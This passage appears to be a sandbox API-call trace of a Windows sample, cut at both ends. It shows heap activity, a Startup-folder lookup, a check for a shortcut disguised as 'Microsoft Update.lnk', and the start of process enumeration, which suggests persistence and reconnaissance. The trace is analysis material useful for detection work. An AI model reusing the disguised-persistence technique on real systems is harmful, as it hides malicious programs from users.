Size=0x4) returned 0x24b1708 [0311.367] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemParametersInfoW", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0311.367] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x16) returned 0x2466e10 [0311.367] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemParametersInfoW", cchWideChar=22, lpMultiByteStr=0x2466e10, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SystemParametersInfoW", lpUsedDefaultChar=0x0) returned 22 [0311.367] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0311.367] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6bc0 [0311.368] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0311.368] GetProcAddress (hModule=0x74f40000, lpProcName="SystemParametersInfoW") returned 0x74f590d3 [0311.368] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0311.368] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0311.368] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0311.368] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1708 [0311.368] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0311.368] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1898 [0311.369] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1198 [0311.369] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0311.369] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0311.369] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0311.369] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0311.369] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0311.369] SystemParametersInfoW (in: uiAction=0x14, uiParam=0x0, pvParam=0x0, fWinIni=0x0 | out: pvParam=0x0) returned 1 [0311.493] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0311.493] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e10 [0311.493] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1198 [0311.493] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0311.493] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0311.493] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0311.493] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1898 [0311.493] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0311.493] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0311.493] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0311.493] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0311.494] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0311.494] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0311.494] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1898 [0311.494] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0311.494] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0311.494] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0311.494] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0311.494] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0311.494] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0311.494] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1898 [0311.494] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0311.494] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0311.494] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0311.494] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0311.494] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0311.494] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0311.494] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1898 [0311.494] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0311.494] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0311.495] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0311.495] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0311.495] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0311.495] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0311.495] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1898 [0311.495] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0311.495] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0311.495] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0311.495] FreeLibrary (hLibModule=0x74f40000) returned 1 [0311.495] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0311.495] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0311.495] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0311.495] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0311.495] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0311.495] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0311.495] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0311.495] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0311.495] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0311.495] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0311.496] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0311.496] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0311.496] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0311.496] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0311.496] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0311.496] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0311.496] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0311.496] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa940 | out: hHeap=0x25c0000) returned 1 [0311.496] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaad8 | out: hHeap=0x25c0000) returned 1 [0311.496] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0311.496] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab50 | out: hHeap=0x25c0000) returned 1 [0311.496] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0311.496] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0311.496] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0311.496] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0311.496] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0311.496] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0311.496] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0311.496] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0311.496] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0311.497] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0288 [0311.497] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0311.497] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0311.497] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a04b0 | out: hHeap=0x25c0000) returned 1 [0311.497] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 1 [0311.497] TranslateMessage (lpMsg=0x8bf710) returned 0 [0311.497] DispatchMessageW (lpMsg=0x8bf710) returned 0x0 [0311.497] KillTimer (hWnd=0x60122, uIDEvent=0x1) returned 1 [0311.497] SetTimer (hWnd=0x60122, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0311.497] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0311.497] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0311.497] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0311.497] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0311.497] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0311.497] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0311.497] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0311.497] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8c8 [0311.497] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0311.497] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0311.498] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0311.498] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0311.498] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0311.498] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0311.498] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0311.498] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0311.498] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0311.498] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0311.498] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b98 | out: hHeap=0x25c0000) returned 1 [0311.498] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0311.498] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c18 | out: hHeap=0x25c0000) returned 1 [0311.498] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa820 | out: hHeap=0x25c0000) returned 1 [0311.498] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b4870 | out: hHeap=0x25c0000) returned 1 [0311.498] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0311.498] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c90 | out: hHeap=0x25c0000) returned 1 [0311.498] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0311.498] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0311.498] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0311.498] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0311.499] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0311.499] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0311.499] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0311.499] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0311.499] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0311.499] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0311.499] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0311.499] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b69e0 | out: hHeap=0x25c0000) returned 1 [0311.499] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0311.499] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0311.499] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0311.499] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cb0 | out: hHeap=0x25c0000) returned 1 [0311.499] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0311.499] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0311.499] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0311.499] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0311.499] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0311.499] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0311.499] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0311.499] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0311.500] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0311.500] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0311.500] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0311.500] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0311.500] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0311.500] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0311.500] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0311.500] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0311.500] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0311.500] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa850 [0311.500] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9d0 [0311.500] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0311.500] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab20 [0311.500] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0311.500] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x24207f0 [0311.500] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dd8 [0311.500] CharUpperBuffW (in: lpsz="StartupDir", cchLength=0xa | out: lpsz="STARTUPDIR") returned 0xa [0311.500] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaa8 [0311.500] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0311.501] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aaa18 [0311.501] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0311.501] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0311.501] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aaaa8 [0311.501] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0311.501] SHGetFolderPathW (in: hwnd=0x0, csidl=7, hToken=0x0, dwFlags=0x0, pszPath=0x8bf2a0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup") returned 0x0 [0311.511] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0311.511] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc0) returned 0x249c7b0 [0311.511] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1198 [0311.512] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0311.512] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0311.512] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0311.512] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0311.512] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0311.512] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0311.512] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0311.512] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0311.512] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0311.512] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0311.512] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0311.512] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0311.512] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa850 [0311.512] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1d0) returned 0x24b2e00 [0311.512] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0311.512] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0311.512] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0311.512] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0311.512] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0311.513] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup/Microsoft Update.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\startup\\microsoft update.lnk")) returned 0x20 [0311.513] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2e00 | out: hHeap=0x25c0000) returned 1 [0311.513] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0311.513] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0311.513] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0311.513] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0311.513] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0311.513] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0311.513] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d6e0 [0311.513] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0311.513] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d6e0 | out: hHeap=0x25c0000) returned 1 [0311.513] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0311.513] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0311.513] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0311.513] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0311.513] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0311.513] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0311.513] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0311.514] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x294 [0311.516] Process32FirstW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0311.516] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0311.517] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0311.518] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0311.519] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: 